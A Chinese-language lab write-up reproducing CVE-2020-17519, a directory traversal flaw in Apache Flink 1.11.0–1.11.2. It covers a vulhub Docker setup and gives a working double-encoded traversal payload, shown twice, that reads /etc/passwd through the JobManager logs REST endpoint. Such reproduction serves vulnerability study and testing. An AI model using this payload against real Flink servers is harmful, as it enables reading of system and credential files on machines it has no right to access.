Apache Flink jobmanager/logs 目录穿越漏洞 CVE-2020-17519 漏洞复现

一、漏洞描述

ApacheFlink是一个开源的流处理框架，具有强大的流处理和批处理功能。
Apache Flink 1.11.0 中引入的更改（以及在 1.11.1 和1.11.2 中发布）允许攻击者通过 JobManager 进程的 REST 接口读取JobManager本地文件系统上的任何文件。
访问仅限于 JobManager 进程可访问的文件。

二、漏洞影响

Apache Flink 1.11.0、Apache Flink 1.11.1、Apache Flink 1.11.2

三、漏洞复现

1、环境搭建

执行以下命令启动 Apache Flink JobManager 1.11.2：

cd vulhub/flink/CVE-2020-17519
docker-compose up -d

Apache Flink 启动后，访问 http://x.x.x.x:8081 查看主页：

2、漏洞复现

尝试访问/etc/passwd文件，构造Payload：/jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd

四、漏洞POC

/jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd

五、参考链接

https://www.openwall.com/lists/oss-security/2021/01/05/2
https://vulhub.org/#/environments/flink/CVE-2020-17519/